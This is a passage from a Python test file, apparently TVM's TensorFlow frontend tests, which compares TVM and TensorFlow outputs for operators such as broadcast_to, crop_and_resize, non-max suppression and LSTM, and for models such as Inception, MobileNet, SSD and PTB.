_test_resize_nearest_neighbor((6, 32, 32, 3), [20, 20])
_test_resize_nearest_neighbor_dynamic_shape((1, 16, 16, 3), scale=[2, 2])
#######################################################################
# BroadcastTo
# -----------
def _test_broadcast_to(in_shape, to_shape):
""" One iteration of broadcast_to"""
data = np.random.uniform(size=in_shape).astype("float32")
shape_data = np.array(to_shape).astype("int32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
shape_data = constant_op.constant(
shape_data, shape=shape_data.shape, dtype=shape_data.dtype
)
tf.broadcast_to(in_data, shape_data)
compare_tf_with_tvm(data, "Placeholder:0", "BroadcastTo:0", opt_level=0)
def _test_broadcast_to_from_tensor(in_shape):
""" One iteration of broadcast_to with unknown shape at graph build"""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=[None], dtype=data.dtype)
shape_data = tf.multiply(tf.shape(in_data), 32)
tf.broadcast_to(in_data, shape_data)
compare_tf_with_tvm(data, "Placeholder:0", "BroadcastTo:0")
def test_forward_broadcast_to():
""" Resize Bilinear """
_test_broadcast_to((4, 1, 32, 32), [4, 8, 32, 32])
_test_broadcast_to((6, 32, 32, 1), [6, 32, 32, 16])
_test_broadcast_to_from_tensor((1))
#######################################################################
# Fill
# ----
def _test_fill(in_shape):
""" Use the fill op to create a tensor of ones with non-constant shape."""
with tf.Graph().as_default():
tf.ones(shape=in_shape, dtype="float32")
compare_tf_with_tvm(in_shape, [], "ones:0", opt_level=1)
def _test_fill_from_tensor(in_shape):
"""Use the fill op to create a tensor of ones with non-constant shape.
Some extra ops need to be added here to prevent the graph from
being fully constant and folded away."""
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(
shape=[in_shape[0], in_shape[1], None, None], dtype=data.dtype
)
x = tf.ones(shape=2 * tf.shape(in_data), dtype=data.dtype)
y = tf.math.add(in_data, tf.reduce_mean(x), name="out1")
compare_tf_with_tvm(data, "Placeholder:0", "out1:0")
def _test_fill_symbolic_inputs(in_shape_data, in_value_data, dtype):
with tf.Graph().as_default():
in_shape = tf.placeholder(shape=[in_shape_data.shape[0]], dtype=in_shape_data.dtype)
in_value = tf.placeholder(shape=(), dtype=dtype)
out = tf.fill(in_shape, in_value)
for mode in ["debug", "vm"]:
compare_tf_with_tvm(
[in_shape_data, in_value_data], [in_shape.name, in_value.name], out.name, mode=mode
)
def test_forward_fill():
""" Resize Bilinear """
_test_fill((32))
_test_fill((6, 32, 64, 64))
_test_fill_from_tensor((6, 32, 64, 64))
_test_fill_symbolic_inputs(np.array((2,)), np.int32(9), tf.int32)
_test_fill_symbolic_inputs(np.array((2, 3)), 9, tf.int64)
_test_fill_symbolic_inputs(np.array((2, 3, 4)), np.float32(9.0), tf.float32)
#######################################################################
# Crop to bounding box
# --------------------
def _test_crop(in_shape, off_h, off_w, tar_h, tar_w):
""" Crop to bounding box """
data = np.random.uniform(size=in_shape).astype("float32")
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
tf.image.crop_to_bounding_box(in_data, off_h, off_w, tar_h, tar_w)
compare_tf_with_tvm(data, "Placeholder:0", "crop_to_bounding_box/Slice:0")
def test_forward_crop():
""" Crop to bounding box """
_test_crop((1, 224, 224, 3), 20, 20, 120, 120)
#######################################################################
# CropAndResize
# -------------
def _test_forward_crop_and_resize(
img_shape,
boxes,
box_idx,
crop_size,
extrapolation_value=0.0,
method="bilinear",
dtype="float32",
):
image = np.random.uniform(0, 10, size=img_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = array_ops.placeholder(dtype, image.shape, name="in_data")
tf.image.crop_and_resize(
in_data,
boxes=boxes,
box_ind=box_idx,
crop_size=crop_size,
method=method,
extrapolation_value=extrapolation_value,
name="crop_and_resize",
)
compare_tf_with_tvm([image], ["in_data:0"], "crop_and_resize:0")
def test_forward_crop_and_resize():
""" CropAndResize """
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3])
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3], 0.2)
_test_forward_crop_and_resize([1, 6, 6, 3], [[0, 0, 1, 1]], [0], [3, 3], 0.2, "nearest")
_test_forward_crop_and_resize([1, 11, 11, 3], [[0.3, 0.3, 1, 1]], [0], [21, 21])
_test_forward_crop_and_resize([1, 41, 41, 3], [[0.2, 0.4, 0.8, 0.8]], [0], [21, 11])
_test_forward_crop_and_resize([1, 100, 100, 3], [[0, 0, 0.9, 0.9]], [0], [30, 30])
_test_forward_crop_and_resize([1, 224, 224, 3], [[0.1, 0.2, 1, 1]], [0], [9, 9])
_test_forward_crop_and_resize([1, 249, 249, 3], [[0, 0, 1, 1]], [0], [9, 9])
_test_forward_crop_and_resize([1, 201, 301, 3], [[0.2, 0.3, 0.7, 0.8]], [0], [51, 51])
_test_forward_crop_and_resize(
img_shape=[10, 11, 11, 3],
boxes=[[0, 0, 0.9, 0.9], [0.2, 0.2, 0.8, 0.8]],
box_idx=[0, 1],
crop_size=[5, 5],
)
_test_forward_crop_and_resize(
img_shape=[20, 576, 576, 3],
boxes=[[0, 0, 1, 1], [0, 0, 0.8, 0.8], [0.1, 0.2, 0.9, 1], [0.2, 0, 1, 1]],
box_idx=[1, 0, 2, 3],
crop_size=[24, 24],
extrapolation_value=0.3,
)
_test_forward_crop_and_resize(
img_shape=[20, 229, 229, 3],
boxes=[[0, 0, 0.9, 0.9], [0.3, 0.3, 1, 1], [0.2, 0.1, 0.7, 0.8], [0, 0, 1, 1]],
box_idx=[3, 0, 2, 1],
crop_size=[58, 58],
extrapolation_value=0.2,
method="nearest",
)
#######################################################################
# Non Max Suppression
# -------------------
def _test_forward_nms_v3(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.non_max_suppression(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
"nms/NonMaxSuppressionV3:0",
mode="vm",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
"nms/NonMaxSuppressionV3:0",
mode="debug",
)
def _test_forward_nms_v4(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
indices_padded, num_valid = tf.image.non_max_suppression_padded(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
name="nms",
pad_to_max_output_size=True,
)
num_valid = tf.reshape(num_valid, shape=(-1,))
indices_padded = tf.reshape(indices_padded, shape=(-1,))
tf.slice(indices_padded, tf.constant([0]), num_valid, name="SlicedIndices")
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV4:1", "SlicedIndices:0"],
mode="vm",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV4:1", "SlicedIndices:0"],
mode="debug",
)
def _test_forward_nms_v5(
bx_shape, score_shape, iou_threshold, score_threshold, out_size, dtype="float32"
):
boxes = np.random.uniform(0, 10, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.non_max_suppression_with_scores(
boxes=in_data_1,
scores=in_data_2,
max_output_size=in_data_3,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
["nms/NonMaxSuppressionV5:0", "nms/NonMaxSuppressionV5:1"],
mode="vm",
)
def test_forward_nms():
""" NonMaxSuppressionV3,5 """
for _test_forward_nms in [_test_forward_nms_v3, _test_forward_nms_v5]:
_test_forward_nms((5, 4), (5,), 0.7, 0.5, 5)
_test_forward_nms((20, 4), (20,), 0.5, 0.6, 10)
_test_forward_nms((1000, 4), (1000,), 0.3, 0.7, 1000)
_test_forward_nms((2000, 4), (2000,), 0.4, 0.6, 7)
def _test_forward_combined_nms(
bx_shape,
score_shape,
iou_threshold,
score_threshold,
out_size,
total_size,
clip_boxes=False,
dtype="float32",
):
boxes = np.random.uniform(-1, 2, size=bx_shape).astype(dtype)
scores = np.random.uniform(size=score_shape).astype(dtype)
max_output_size = np.int32(out_size)
tf.reset_default_graph()
in_data_1 = tf.placeholder(dtype, boxes.shape, name="in_data_1")
in_data_2 = tf.placeholder(dtype, scores.shape, name="in_data_2")
in_data_3 = tf.placeholder(tf.int32, name="in_data_3")
tf.image.combined_non_max_suppression(
boxes=in_data_1,
scores=in_data_2,
max_output_size_per_class=in_data_3,
max_total_size=total_size,
iou_threshold=iou_threshold,
score_threshold=score_threshold,
pad_per_class=False,
clip_boxes=clip_boxes,
name="nms",
)
compare_tf_with_tvm(
[boxes, scores, max_output_size],
["in_data_1:0", "in_data_2:0", "in_data_3:0"],
[
"nms/CombinedNonMaxSuppression:0",
"nms/CombinedNonMaxSuppression:1",
"nms/CombinedNonMaxSuppression:2",
"nms/CombinedNonMaxSuppression:3",
],
mode="vm",
)
def test_forward_combined_nms():
""" CombinedNonMaxSuppression """
_test_forward_combined_nms((1, 64, 1, 4), (1, 64, 1), 0.7, 0.5, 64, 64)
_test_forward_combined_nms((1, 64, 1, 4), (1, 64, 20), 0.7, 0.5, 64, 10)
_test_forward_combined_nms((1, 64, 20, 4), (1, 64, 20), 0.7, 0.5, 64, 64, clip_boxes=True)
_test_forward_combined_nms((2, 200, 1, 4), (2, 200, 1), 0.4, 0.6, 100, 100)
#######################################################################
# LSTM
# ----
def _test_lstm_cell(batch_size, num_hidden, num_layers, forget_bias, dtype):
""" One iteration of a LSTM cell """
tf.reset_default_graph()
input_size = num_hidden
input_data = np.full((batch_size, input_size), 1.0, dtype=dtype)
in_state_c = np.full((batch_size, num_hidden), 0.1, dtype=dtype)
in_state_h = np.full((batch_size, num_hidden), 0.1, dtype=dtype)
def _get_tensorflow_output():
with tf.Session() as sess:
with variable_scope.variable_scope(
"root", initializer=init_ops.constant_initializer(0.5)
):
m0 = tf.placeholder(dtype, [batch_size, num_hidden], name="m0")
m1 = tf.placeholder(dtype, [batch_size, num_hidden], name="m1")
x = tf.placeholder(shape=(batch_size, input_size), dtype=dtype, name="input")
g, ((out_m0, out_m1)) = tensorflow.contrib.rnn.LSTMBlockCell(
num_hidden, forget_bias=forget_bias
)(x, (m0, m1))
sess.run([variables.global_variables_initializer()])
res = sess.run(
[g, out_m0, out_m1],
{
x.name: np.array([[1.0, 1.0]]),
m0.name: in_state_c,
m1.name: in_state_h,
},
)
graph_def = sess.graph.as_graph_def(add_shapes=True)
final_graph_def = graph_util.convert_variables_to_constants(
sess, graph_def, ["root/lstm_cell/LSTMBlockCell"]
)
return final_graph_def, res
graph_def, tf_out = _get_tensorflow_output()
tvm_output = run_tvm_graph(
graph_def,
[input_data, in_state_c, in_state_h],
["root/input", "root/m0", "root/m1"],
num_output=7,
)
assert isinstance(tvm_output, list)
tvm.testing.assert_allclose(tf_out[0], tvm_output[6], rtol=1e-3, atol=1e-3)
tvm.testing.assert_allclose(tf_out[1], tvm_output[1], rtol=1e-3, atol=1e-3)
def test_forward_lstm():
"""test LSTM block cell"""
if package_version.parse(tf.VERSION) < package_version.parse("2.0.0"):
# in 2.0, tf.contrib.rnn.LSTMBlockCell is removed
_test_lstm_cell(1, 2, 1, 0.5, "float32")
#######################################################################
# Pack
# ---
def _test_pack(axis, shape, **kwargs):
a = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
b = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
with tf.Graph().as_default():
tf_a = array_ops.placeholder(shape=shape, dtype="float32", name="pl_a")
tf_b = array_ops.placeholder(shape=shape, dtype="float32", name="pl_b")
tf_c = tf.stack([tf_a, tf_b], axis=axis, **kwargs)
assert tf_c.op.op_def.name == "Pack", "tf.stack() is expected to produce 'Pack' operation"
compare_tf_with_tvm([a, b], ["pl_a:0", "pl_b:0"], "stack:0")
def test_forward_pack():
for axis in range(-3, 3):
_test_pack(axis, [3, 2, 1])
for axis in range(-1, 1):
_test_pack(axis, [3])
_test_pack(0, [])
#######################################################################
# Unpack
# ------
def _test_forward_unpack(in_shape, axis, dtype):
"""test operator Unpack"""
np_data = np.random.uniform(-100, 100, size=in_shape).astype(dtype)
tf.reset_default_graph()
with tf.Graph().as_default():
in_data = tf.placeholder(dtype, in_shape, name="in_data")
tf.unstack(in_data, axis=axis, name="Unpack")
compare_tf_with_tvm([np_data], ["in_data:0"], "Unpack:0")
def test_forward_unpack():
_test_forward_unpack((3,), 0, "int32")
_test_forward_unpack((3,), -1, "int16")
_test_forward_unpack((21, 23, 3), 2, "float32")
#######################################################################
# Range
# -----
def test_forward_range():
"""test operator Range"""
for dtype in [tf.int32, tf.int64]:
tf.reset_default_graph()
with tf.Graph().as_default():
tf.range(1, 18, 3, name="range", dtype=dtype)
compare_tf_with_tvm([], [], "range:0")
"""test type assignment for operator Range"""
tf.reset_default_graph()
with tf.Graph().as_default():
tf.range(1, 256 + 1, 1, dtype=tf.float32)
compare_tf_with_tvm([], [], "range:0")
#######################################################################
# Pad
# ---
def _test_pad(input_shape, paddings, mode, **kwargs):
""" One iteration of pad operation with given shape"""
x = np.arange(np.prod(input_shape), dtype=np.float32).reshape(input_shape)
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
pad_values = constant_op.constant(paddings)
pad = tf.pad(in_data, paddings=pad_values, mode=mode, **kwargs)
if mode == "CONSTANT":
if "constant_values" in kwargs:
out_name = "PadV2:0"
else:
out_name = "Pad:0"
else:
out_name = "MirrorPad:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name)
def test_forward_pad():
""" Pad """
_test_pad((2, 3), [[1, 1], [2, 2]], mode="CONSTANT")
_test_pad((2, 3), [[1, 1], [2, 2]], mode="CONSTANT", constant_values=1.0)
_test_pad((2, 3), [[1, 1], [2, 2]], mode="SYMMETRIC")
_test_pad((2, 3), [[1, 1], [2, 2]], mode="REFLECT")
#######################################################################
# Logical operators
# --------------------
def test_logical_and():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_and(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_or():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_or(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_xor():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
in2 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in2")
out = tf.logical_xor(in1, in2, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
in_data2 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm([in_data1, in_data2], ["in1:0", "in2:0"], "out:0")
def test_logical_not():
with tf.Graph().as_default():
in1 = tf.placeholder(tf.bool, shape=[1, 4, 4, 3], name="in1")
out = tf.logical_not(in1, name="out")
in_data1 = np.random.choice(a=[False, True], size=(1, 4, 4, 3)).astype("bool")
compare_tf_with_tvm(in_data1, "in1:0", "out:0")
def test_forward_logical():
test_logical_and()
test_logical_or()
test_logical_xor()
test_logical_not()
#######################################################################
# Where, Select
# -------------
def test_forward_where():
""" Where: return elements depending on conditions"""
with tf.Graph().as_default():
with tf.Session() as sess:
input1 = tf.placeholder(tf.int32, shape=[1, 4, 4, 3], name="input1")
input2 = tf.placeholder(tf.int32, shape=[1, 4, 4, 3], name="input2")
mask = input1 > input2
tf.where(mask, input1 + 1, input2 * 2)
in_data1 = np.random.uniform(0, 10, size=(1, 4, 4, 3)).astype("uint32")
in_data2 = np.random.uniform(0, 10, size=(1, 4, 4, 3)).astype("uint32")
compare_tf_with_tvm([in_data1, in_data2], ["input1:0", "input2:0"], "Select:0")
#######################################################################
# Inception V3
# ------------
def test_forward_inception_v3():
"""test inception V3 model"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"InceptionV3/inception_v3_2016_08_28_frozen-with_shapes.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 299, 299, 3)).astype("float32")
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "input:0", "InceptionV3/Predictions/Reshape_1:0")
tvm_output = run_tvm_graph(graph_def, data, "input")
tvm.testing.assert_allclose(tf_output[0], tvm_output[0], rtol=1e-5, atol=1e-5)
#######################################################################
# Inception V1
# ------------
def test_forward_inception_v1():
"""test inception V1 model"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload("InceptionV1/classify_image_graph_def-with_shapes.pb")
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
# Build an image from random data.
from PIL import Image
from tvm.contrib import utils
img_array = np.random.uniform(size=(1, 600, 600, 3)).astype("uint8")
img = Image.frombuffer("RGB", (600, 600), img_array.tostring(), "raw", "RGB", 0, 1)
temp = utils.tempdir()
img_path = temp.relpath("tf-test.jpg")
img.save(img_path)
import os.path
if not tf.gfile.Exists(os.path.join(img_path)):
tf.logging.fatal("File does not exist %s", img_path)
data = tf.gfile.FastGFile(os.path.join(img_path), "rb").read()
temp.remove()
# Extract tensorflow decoded image frame for tvm input
with tf.Session() as sess:
tvm_data = run_tf_graph(sess, data, "DecodeJpeg/contents:0", "DecodeJpeg:0")
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "DecodeJpeg/contents:0", "softmax:0")
tvm_output = run_tvm_graph(graph_def, tvm_data, "DecodeJpeg/contents")
tvm.testing.assert_allclose(tf_output[0], tvm_output[0], rtol=1e-5, atol=1e-5)
#######################################################################
# Mobilenet
# ---------
def test_forward_mobilenet():
"""test mobilenet model"""
# MobilenetV2
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"https://storage.googleapis.com/mobilenet_v2/checkpoints/mobilenet_v2_1.4_224.tgz",
"mobilenet_v2_1.4_224_frozen.pb",
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 224, 224, 3)).astype("float32")
out_node = "MobilenetV2/Predictions/Reshape_1"
with tf.Session() as sess:
# Add shapes to the graph.
graph_def = tf_testing.AddShapesToGraphDef(sess, out_node)
tf_output = run_tf_graph(sess, data, "input:0", out_node + ":0")
tvm_output = run_tvm_graph(graph_def, data, "input")
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# ResnetV2
# --------
@tvm.testing.requires_gpu
def test_forward_resnetv2():
"""test resnet model"""
if is_gpu_available():
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"ResnetV2/resnet-20180601_resnet_v2_imagenet-shapes.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(128, 224, 224, 3)).astype("float32")
out_node = "ArgMax"
with tf.Session() as sess:
tf_output = run_tf_graph(sess, data, "input_tensor:0", out_node + ":0")
for device in ["llvm", "cuda"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
graph_def, data, "input_tensor", len(tf_output), target=device
)
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# SSD
# ---
def _test_ssd_impl():
"""Test SSD with backbone MobileNet V1"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload(
"object_detection/ssd_mobilenet_v1_ppn_shared_"
"box_predictor_300x300_coco14_sync_2018_07_03.pb"
)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(0.0, 255.0, size=(1, 512, 512, 3)).astype("uint8")
in_node = "image_tensor"
out_node = ["detection_boxes", "detection_scores", "detection_classes"]
with tf.Session() as sess:
tf_output = run_tf_graph(
sess, data, "{}:0".format(in_node), ["{}:0".format(oname) for oname in out_node]
)
# TODO(kevinthesun): enable gpu test when VM heterogeneous execution is ready.
for device in ["llvm"]:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
tvm_output = run_tvm_graph(
graph_def,
data,
in_node,
len(out_node),
target=device,
layout="NCHW",
out_names=out_node,
mode="vm",
disabled_pass=["FoldScaleAxis"],
serialize=True,
)
for i in range(len(out_node)):
tvm.testing.assert_allclose(tvm_output[i], tf_output[i], rtol=1e-3, atol=1e-3)
def test_forward_ssd():
run_thread = threading.Thread(target=_test_ssd_impl, args=())
old_stack_size = threading.stack_size(100 * 1024 * 1024)
run_thread.start()
run_thread.join()
threading.stack_size(old_stack_size)
#######################################################################
# Placeholder
# -----------
def test_forward_placeholder():
"""test a simple pb with Placeholder node in the end of GraphDef"""
with tf.Graph().as_default():
graph_def = tf_testing.get_workload("Custom/placeholder.pb")
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
data = np.random.uniform(size=(1, 224, 224, 3)).astype("float32")
out_node = "mul"
with tf.Session() as sess:
# Add shapes to the graph.
graph_def = tf_testing.AddShapesToGraphDef(sess, out_node)
tf_output = run_tf_graph(sess, data, "Placeholder:0", out_node + ":0")
tvm_output = run_tvm_graph(graph_def, data, "Placeholder")
tvm.testing.assert_allclose(
np.squeeze(tvm_output[0]), np.squeeze(tf_output[0]), rtol=1e-5, atol=1e-5
)
#######################################################################
# PTB
# ---
try:
# Load contrib for running ptb model in tf version before 2.0
import tensorflow.contrib
except:
pass
def test_forward_ptb():
"""test ptb model"""
config = tf_testing.get_config()
num_steps = config.num_steps
num_hidden = config.hidden_size
num_layers = config.num_layers
batch_size = config.batch_size
vocab_size = config.vocab_size
out_sample_shape = (batch_size, vocab_size)
out_state_shape = (batch_size, num_hidden)
# Sample input
inpt = "we have no useful information on"
cnt_sample = 20
def _pretty_print(items, is_char_model, id2word):
if not is_char_model:
return " ".join([id2word[x] for x in items])
else:
return "".join([id2word[x] for x in items]).replace("_", " ")
def _get_tvm_graph_module(graph_def):
# Cell inputs 'c and 'h' consist of all layers values
shape_dict = {"Model/Placeholder": (batch_size, num_steps)}
mod, params = relay.frontend.from_tensorflow(
graph_def,
shape=shape_dict,
outputs=[
"Model/Softmax:0",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell:1",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell:6",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell_1:1",
"Model/RNN/RNN/multi_rnn_cell/cell_0/lstm_cell/LSTMBlockCell_1:6",
],
)
target = "llvm"
with tvm.transform.PassContext(opt_level=0):
graph, lib, params = relay.build(mod, target, params=params)
from tvm.contrib import graph_executor
dev = tvm.cpu(0)
return params, graph_executor.create(graph, lib, dev)
def _do_tvm_sample(model, data, in_states, params, num_samples):
"""Sampled from the model"""
samples = []
state = in_states
sample = None
def _get_sample(data, state):
input_data = np.full((batch_size, num_steps), data, dtype="int32")
model.set_input("Model/Placeholder", tvm.nd.array(input_data.astype("int32")))
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState/zeros",
tvm.nd.array(state[0].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState/zeros_1",
tvm.nd.array(state[1].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState_1/zeros",
tvm.nd.array(state[2].astype("float32")),
)
model.set_input(
"Model/MultiRNNCellZeroState/LSTMBlockCellZeroState_1/zeros_1",
tvm.nd.array(state[3].astype("float32")),
)
model.set_input(**params)
model.run()
tvm_output = model.get_output(0, tvm.nd.empty(out_sample_shape, "float32")).asnumpy()
state_output = []
for i in range(4):
state_output.append(
model.get_output(i + 1, tvm.nd.empty(out_state_shape, "float32")).asnumpy()
)
sample = tf_testing.pick_from_weight(tvm_output[0])
return sample, state_output
for x in data:
sample, state = _get_sample(x, state)
if sample is not None:
samples.append(sample)
else:
samples.append(0)
k = 1
while k < num_samples:
sample, state = _get_sample(samples[-1], state)
samples.append(sample)
k += 1
return samples, state
with tf.Graph().as_default():
word_to_id, id_to_word, graph_def = tf_testing.get_workload_ptb()
vocab_size = len(word_to_id)
# Call the utility to import the graph definition into default graph.
graph_def = tf_testing.ProcessGraphDefParam(graph_def)
sess = tf.Session()
# TVM graph module creation
params, m = _get_tvm_graph_module(graph_def)
# Create 10 predicted statments of 20 words
cnt_stm = 0
while cnt_stm < 10:
cnt_stm += 1
in_state = [np.full((batch_size, num_hidden), 0, dtype="float32")] * 2 * num_layers
seed_for_sample = inpt.split()
tvm_samples, tvm_state = _do_tvm_sample(
m, [word_to_id[word] for word in seed_for_sample], in_state, params, cnt_sample
)
tvm_sample_str = _pretty_print(tvm_samples, False, id_to_word)
tf_samples, tf_state = tf_testing.do_tf_sample(
sess, [word_to_id[word] for word in seed_for_sample], in_state, cnt_sample
)
tf_sample_str = _pretty_print(tf_samples, False, id_to_word)
inpt = tvm_sample_str
tvm.testing.assert_allclose(tf_samples, tvm_samples, rtol=1e-5, atol=1e-5)
assert tvm_sample_str == tf_sample_str
#######################################################################
# LRN (Local Response Normalization)
# ----------------------------------
def _test_lrn(ishape, size, axis, bias, alpha, beta):
""" testing local response normalization """
lrn_depth_radius = size / 2
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype, name="lrn0_data")
nn_ops.local_response_normalization(
in1, name="lrn", depth_radius=lrn_depth_radius, bias=bias, alpha=alpha, beta=beta
)
compare_tf_with_tvm(inp_array, "lrn0_data:0", "lrn:0")
def test_forward_lrn():
_test_lrn((1, 3, 20, 20), 3, 1, 1.0, 1.0, 0.5)
#######################################################################
# l2_normalize
# ------------
def _test_l2_normalize(ishape, eps, axis):
""" testing l2 normalize (uses max, sum, square, sqrt frontend operators)"""
inp_array = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=inp_array.shape, dtype=inp_array.dtype)
nn.l2_normalize(in1, axis=axis, epsilon=eps, name=None, dim=None)
compare_tf_with_tvm(inp_array, "Placeholder:0", "l2_normalize:0")
def test_forward_l2_normalize():
_test_l2_normalize((1, 3, 20, 20), 0.001, (0,))
#######################################################################
# transpose
# ---------
def _test_forward_transpose(ishape, axes=None):
data = np.random.uniform(size=ishape).astype(np.float32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="transpose_data")
if axes is None:
tf.transpose(in1)
else:
tf.transpose(in1, perm=axes)
compare_tf_with_tvm(data, "transpose_data:0", "transpose:0")
def _test_forward_tranapose_axes_input(ishape, axes):
data = np.random.uniform(size=ishape).astype(np.float32)
axes_np = np.array(axes).astype(np.int32)
with tf.Graph().as_default():
in1 = tf.placeholder(shape=data.shape, dtype=data.dtype, name="transpose_data")
const1 = tf.constant(axes_np, dtype=tf.int32)
# make axes an input to tf.transpose, but not an input to the graph,
# so it can be extracted with infer_value_simulated
axes = tf.reverse(const1, axis=[-1])
tf.transpose(in1, axes)
compare_tf_with_tvm([data], ["transpose_data:0"], "transpose:0")
def test_forward_transpose():
_test_forward_transpose((2, 3, 4), (1, 2, 0))
_test_forward_transpose((2, 3, 4))
_test_forward_transpose((7, 8, 8, 10))
_test_forward_transpose((2, 3, 4), (1, 2, 0))
_test_forward_transpose((2, 3, 4), (0, 1, 2))
